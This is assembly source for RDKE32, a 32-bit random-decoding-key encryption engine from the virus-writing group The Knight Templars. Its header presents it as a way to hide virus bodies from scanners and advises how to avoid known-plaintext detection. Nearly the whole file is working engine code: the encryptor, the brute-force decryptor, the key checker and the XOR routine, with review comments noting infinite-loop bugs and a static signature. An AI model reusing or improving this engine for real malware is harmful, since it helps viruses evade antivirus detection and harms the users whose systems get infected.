comment *
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
ßßßÛÛÛÛÛÛ ÜÜ ßßß ßßß ÜÜÜ ÛÛÛÛÛÛßßß
±ÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ°
ÛÛÛÛ ÛÛÛÛÛÛ ²ÛÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ² ÛÛÛÛ
°ÛÛÛÛ ÛÛÛÛÛßÛÛÛÛß ÛÛÛÛ
±ÛÛÛÛ ÛÛÛÛ² ÛÛÜÜ ÛÛÛÛ°
ÜÜÜÜÜÜÜÜÜÜÜÜÜ ²ÛÛÛÛ ÛÛÛÛ± ÛÛÛÛ²Ü ÛÛÛÛ± ÜÜÜÜÜÜÜÜÜÜÜÜ
Û ÛÛÛÛÛ ÛÛÛÛ² ²ÛÛÛÛÛ° ÛÛÛÛ² Û
Û ÛÛÛÛÛ ÜÛÛÛÛÛ ²ÛÛÛÛ² ÛÛÛÛÛ Û
ßÜ ßßßßß ßßßß ßßßß ßßßßß Üß
ÜßßßßßßßßßßßßßßßßþThe Knight TemplarsþßßßßßßßßßßßßßßßÜ
Û Û
Û Random Decoding Key Engine 32-bit v 1.0 [RDKE32] Û
Û Code by Û
Û Darkman/TKT Û
Û Û
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
Do not use this engine to encrypt known plaintext such as the actual virus
code. It is possible to recover known plaintext encrypted with this
engine using the X-RAY technique (a known-plaintext attack, i.e. plain
cryptanalysis). You can read more about this technique in "Detecting oh,
roughly every polymorphic engine out there", an article by Rhincewind/VLAD,
published in VLAD Magazine issue 4. Billy Belcebu/iKx made this mistake in
Win32.Legacy using his Internal ENCryptor v 1.0 [iENC], a Random Decoding
Key (RDK) engine using an 8-bit eXclusive OR (XOR) algorithm to encrypt the
actual virus in 19 different blocks.
Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.
*
hash_size equ (0a0h/08h) ; Digest length in bytes: 160 bits / 8 = 20
                         ; (one SHA-1 digest). Used for the scratch
                         ; buffer and the compare length in
                         ; RDKE32Decrypt.
_RDKE32Encrypt struc ; Stack-argument layout of RDKE32Encrypt. The
                     ; offsets are applied as
                     ; [esp._field+size _pushad+04h], i.e. above the
                     ; pushad frame and the return address.
                     ; size = 16 bytes, popped by `ret size ...`.
 _lpHash dd ?        ; [out] receives the hash of the plaintext
 _lpBuffer dd ?      ; [in,out] data hashed, then encrypted in place
 _dwNumberOfBytesToHashAndEncrypt dd ?
                     ; [in] byte count
 _dwSecurityLevel dd ?
                     ; [in] key range / brute-force effort, must be
                     ; non-zero (see test_key_security)
ends
_RDKE32Decrypt struc ; Stack-argument layout of RDKE32Decrypt, used the
                     ; same way as _RDKE32Encrypt. size = 12 bytes,
                     ; popped by `ret size ...`.
 _lpHash dd ?        ; [in] hash_size bytes written by RDKE32Encrypt
 _lpBuffer dd ?      ; [in,out] ciphertext, decrypted in place
 _dwNumberOfBytesToDecrypt dd ?
                     ; [in] byte count
ends
_pushad struc ; Memory image left by PUSHAD, lowest address first
              ; (EAX is pushed first, so it ends up highest).
              ; `size _pushad` (32) is the distance from ESP to the
              ; return address inside a pushad-framed proc.
 _edi dd ?
 _esi dd ?
 _ebp dd ?
 _esp dd ?    ; value of ESP before the PUSHAD
 _ebx dd ?
 _edx dd ?
 _ecx dd ?
 _eax dd ?
ends
rdke32_begin:
; RDKE32Encrypt
;
;
; The RDKE32Encrypt function hashes the plaintext and then encrypts the data
; in place. The key is not stored anywhere; RDKE32Decrypt recovers it by
; brute force against the stored hash.
;
; VOID RDKE32Encrypt(
; LPVOID lpHash // data buffer to receive hash
; LPVOID lpBuffer // data buffer of data to hash and encrypt
; DWORD dwNumberOfBytesToHashAndEncrypt // number of bytes to hash and
; // encrypt
; DWORD dwSecurityLevel // security level
; );
;
; Parameters
; lpHash
; [out] Pointer to the buffer that receives the hash.
; lpBuffer
; [in, out] Pointer to the buffer containing the data to be hashed and
; encrypted; it is overwritten in place with the ciphertext.
; dwNumberOfBytesToHashAndEncrypt
; [in] Specifies the number of bytes to be hashed and encrypted.
; dwSecurityLevel
; [in] Specifies the security level of the encryption. The higher it is the
; longer it will take for RDKE32Decrypt to bruteforce and decrypt the
; encrypted data. Must be non-zero: with 0 every candidate key is rejected
; by test_key_security and RDKE32Encrypt never returns.
;
; Return Values
; This function does not return a value.
RDKE32Encrypt proc ; Random Decoding Key Engine 32-bit
                   ; v 1.00 [RDKE32] encryptor
;
; In (stack, see _RDKE32Encrypt): lpHash, lpBuffer,
;     dwNumberOfBytesToHashAndEncrypt, dwSecurityLevel.
; Out: [lpHash] = hash of the PLAINTEXT; [lpBuffer] XORed in place with
;     a random 32-bit key that is discarded by popad and never written
;     anywhere - RDKE32Decrypt has to brute-force it against the hash.
; Clobbers: flags only (pushad/popad). Callee pops its 16 bytes of
;     arguments (ret size _RDKE32Encrypt).
; Security note: the plaintext hash sits in the clear next to the
;     ciphertext, so anyone holding the buffer can run exactly the
;     search RDKE32Decrypt runs; dwSecurityLevel only bounds the work,
;     it gives no confidentiality. The cipher itself is a repeating
;     1-to-4-byte XOR (see cryptor).
 pushad
 mov edi,[esp._lpHash+size _pushad+04h]
                   ; EDI = lpHash (arguments lie above the 32-byte
                   ; pushad frame and the 4-byte return address)
 mov ebx,[esp._lpBuffer+size _pushad+04h]
                   ; EBX = lpBuffer
 mov ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
                   ; ECX = byte count
 mov eax,[esp._dwSecurityLevel+size _pushad+04h]
                   ; EAX = security level
 call SHA1, edi, ecx, ebx
                   ; Hash the plaintext into [EDI] BEFORE encrypting.
                   ; TASM extended call; SHA1 is defined outside this
                   ; file, argument push order follows the assembler's
                   ; language model, and SHA1 is presumed to preserve
                   ; EAX/EBX/ECX since they are reused below - confirm.
insecure_key:
 call GetRandomNumberWithinRange
                   ; Defined elsewhere; presumably EAX = range and the
                   ; candidate key comes back in EDX, which is what
                   ; test_key_security and cryptor read - confirm.
 call test_key_security
 jz insecure_key   ; ZF=1 = key rejected (two equal non-zero key bytes,
                   ; or EAX == 0) -> draw another one.
                   ; NOTE(review): with dwSecurityLevel == 0 every key
                   ; is rejected and this loop never terminates.
 call cryptor      ; XOR [EBX..EBX+ECX) in place with the key in EDX
 popad
 ret size _RDKE32Encrypt
endp
; RDKE32Decrypt
;
;
; The RDKE32Decrypt function recovers the encryption key by brute force,
; using the stored hash of the plaintext as the verifier, and decrypts the
; data in place.
;
; VOID RDKE32Decrypt(
; LPVOID lpHash // data buffer of hash
; LPVOID lpBuffer // data buffer of data to decrypt
; DWORD dwNumberOfBytesToDecrypt // number of bytes to decrypt
; );
;
; Parameters
; lpHash
; [in] Pointer to the buffer containing the hash (hash_size bytes, as written
; by RDKE32Encrypt).
; lpBuffer
; [in, out] Pointer to the buffer containing the data to be decrypted; it is
; overwritten in place with the plaintext.
; dwNumberOfBytesToDecrypt
; [in] Specifies the number of bytes to be decrypted.
;
; Return Values
; This function does not return a value.
RDKE32Decrypt proc ; Random Decoding Key Engine 32-bit
                   ; v 1.00 [RDKE32] decryptor
;
; In (stack, see _RDKE32Decrypt): lpHash (hash_size bytes written by
;     RDKE32Encrypt), lpBuffer, dwNumberOfBytesToDecrypt.
; Out: [lpBuffer] decrypted in place.
; How: the key was never stored, so 32-bit keys are tried in ascending
;     order, skipping the ones test_key_security rejects (exactly the
;     ones the encryptor would not have chosen); a candidate is
;     accepted when the hash of the trial plaintext equals [lpHash].
;     Cost is one SHA1 over the whole buffer per candidate - this is
;     the work dwSecurityLevel in RDKE32Encrypt scales.
; Clobbers: flags only (pushad/popad). Callee pops its 12 bytes of
;     arguments. Uses hash_size bytes of stack as scratch.
; Assumes DF = 0 for rep cmpsd (no cld here; caller's responsibility).
; NOTE(review): EAX is never loaded in this proc, but test_key_security
;     reports "insecure" (ZF=1) whenever EAX == 0, so a caller entering
;     with EAX == 0 never leaves bruteforce_loop. Either give EAX a
;     non-zero value before the loop (e.g. `or eax,-1` after
;     `xor edx,edx`) or drop the EAX test in test_key_security; confirm
;     what callers currently rely on.
; NOTE(review): there is no failure path. If no key reproduces the hash
;     (corrupt buffer, wrong length, wrong hash) every 32-bit key is
;     tried, EDX then wraps to 0, key 0 passes test_key_security, and
;     cryptor with a zero key never terminates.
 pushad
 mov edi,[esp._lpHash+size _pushad+04h]
                   ; EDI = lpHash (expected digest)
 mov ebx,[esp._lpBuffer+size _pushad+04h]
                   ; EBX = lpBuffer
 mov ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
                   ; ECX = byte count
 sub esp,hash_size ; Scratch space for the candidate digest
 mov esi,esp       ; ESI = candidate digest buffer
 xor edx,edx
bruteforce_loop:
 inc edx           ; EDX = next candidate key. Starts at 1, so keys
                   ; 1..255 (plain single-byte XOR, see cryptor) are
                   ; tried first.
 call test_key_security
 jz bruteforce_loop ; Skip keys the encryptor would have rejected
 call cryptor      ; Trial decrypt in place
 call SHA1, esi, ecx, ebx
                   ; Hash the trial plaintext into the scratch buffer
 pushad            ; cmpsd advances ESI/EDI and consumes ECX; keep them
 push (hash_size/04h)
 pop ecx           ; Compare hash_size/4 dwords
 rep cmpsd         ; [ESI] == [EDI] -> ZF=1 -> correct key
 popad             ; popad leaves the flags alone
 je RDKE32Decrypt_exit
 call cryptor      ; Wrong key: XOR again with the same key to restore
                   ; the ciphertext before trying the next one
 jmp bruteforce_loop
RDKE32Decrypt_exit:
 add esp,hash_size
 popad
 ret size _RDKE32Decrypt
endp
test_key_security proc ; Test the security of the 32-bit key
;
; In:  EDX = candidate key, EAX = security level (only tested for 0).
; Out: ZF = 1 -> key rejected ("insecure"); ZF = 0 -> key accepted.
;      The flags are the return value; they survive popad.
; Clobbers: flags only.
; A key is rejected when EAX == 0 or when any two of its four bytes are
; equal AND non-zero (every pair (i,j), i<j, is compared exactly once).
; Zero bytes are never compared, so they may repeat; since cryptor also
; skips zero key bytes, keys such as 000000xxh - a plain single-byte
; repeating XOR - are accepted as "secure".
 pushad
 test eax,eax      ; EAX == 0 -> ZF=1 -> rejected
 jz test_key_exit
 push 03h
 pop ecx           ; ECX = 3 reference bytes (byte 0, then 1, then 2)
test_key_loop:
 mov eax,edx       ; EAX = key rotated so that DL is the reference byte
 mov ebx,ecx       ; EBX = number of later bytes to compare against DL
_test_key_loop:
 rol eax,08h       ; AL = next key byte
 test al,dl        ; AL & DL == 0 (in particular both zero) -> skip
 jz test_next_key
 cmp al,dl         ; Equal non-zero bytes -> ZF=1 -> rejected
 je test_key_exit
test_next_key:
 dec ebx
 jnz _test_key_loop
 rol edx,08h       ; Advance the reference byte (EDX restored by popad)
 loop test_key_loop
 inc ecx           ; ECX is 0 here; INC makes it 1 and clears the ZF
                   ; that `dec ebx` left set -> ZF=0 = accepted
test_key_exit:
 popad
 ret
endp
cryptor proc ; 32-bit encryptor/decryptor
;
; In:  EBX = buffer, ECX = byte count, EDX = 32-bit key.
; Out: [EBX..EBX+ECX) XORed in place, one key byte per data byte,
;      low key byte first, the key rotating by 8 bits each step.
;      Running it twice with the same key restores the data (XOR is
;      its own inverse) - that is how RDKE32Decrypt backs out a wrong
;      guess.
; Clobbers: flags only (pushad/popad; EDX is returned unrotated).
; Zero key bytes are skipped without consuming a data byte: the
;      inc ecx / dec ecx pair cancels the decrement `loop` performs, so
;      the effective key is just the non-zero bytes cycling.
; Not handled (callers must avoid): EDX == 0 never consumes a byte and
;      never terminates; ECX == 0 on entry wraps through `loop` when
;      the first key byte is non-zero and runs past the buffer.
; This is a repeating 1-to-4-byte XOR; the known-plaintext (X-RAY)
;      attack the file header warns about applies to it.
 pushad
crypt_loop:
 inc ecx           ; Pre-compensate the decrement done by `loop`...
 test dl,dl        ; ...undone below only when this key byte is non-zero
 jz dont_crypt
 dec ecx
 xor [ebx],dl      ; Apply the current key byte
 inc ebx
dont_crypt:
 rol edx,08h       ; Next key byte into DL
 loop crypt_loop
 popad
 ret
endp
 db ' [RDKE32] '   ; Marker string inside the engine body: it lies
                   ; between rdke32_begin and rdke32_end, so it counts
                   ; toward rdke32_size and is a constant byte sequence
                   ; in every copy - a trivial static signature.
rdke32_end:
rdke32_size equ (rdke32_end-rdke32_begin)
                   ; Engine length in bytes, computed by the assembler